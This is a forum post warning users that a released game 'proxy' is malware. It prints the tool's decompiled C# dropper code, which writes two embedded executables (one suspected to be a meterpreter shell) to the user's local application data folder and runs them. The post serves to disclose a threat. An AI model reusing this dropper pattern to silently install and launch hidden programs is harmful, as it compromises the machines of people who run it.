I can have confirmation that this is a malicius file (I guess it is metasploit but it is too early to tell) inside of this "proxy" and it writes two files to %AppData% : "JKSYSpkQbg.exe" and "FPewwxQAhM.exe" I will keep uyou posted, this is a threat.
Here is the source code of the program:
Code:
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Resources;
namespace Bound
{
internal static class Open
{
private static void Main()
{
try
{
ResourceManager resourceManager = new ResourceManager("files", Assembly.GetExecutingAssembly());
File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "JKSYSpkQbg.exe", (byte[]) resourceManager.GetObject("TGMdRmjNpf"));
Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "JKSYSpkQbg.exe");
File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "FPewwxQAhM.exe", (byte[]) resourceManager.GetObject("KCTnsdBxFI"));
Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "FPewwxQAhM.exe");
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
Console.Read();
}
}
}
}
The resources are basically Base64 string of the program, when you decrypt the base64, you get the exe basically, and there are 2 that are viruses
First file scan AxZvCDtRsA.exe which is the "proxy" but also contains malicious code:
The second file FPewwxQAhM.exe which seems to be a meterpreter shell:
![[Release] invincible , Avatar MagOpt Exploit](https://www.elitepvpers.com/forum/iconimages/sro-pserver-guides-releases/release-invincible-avatar-magopt-exploit_ltr.gif){kind=avatar}
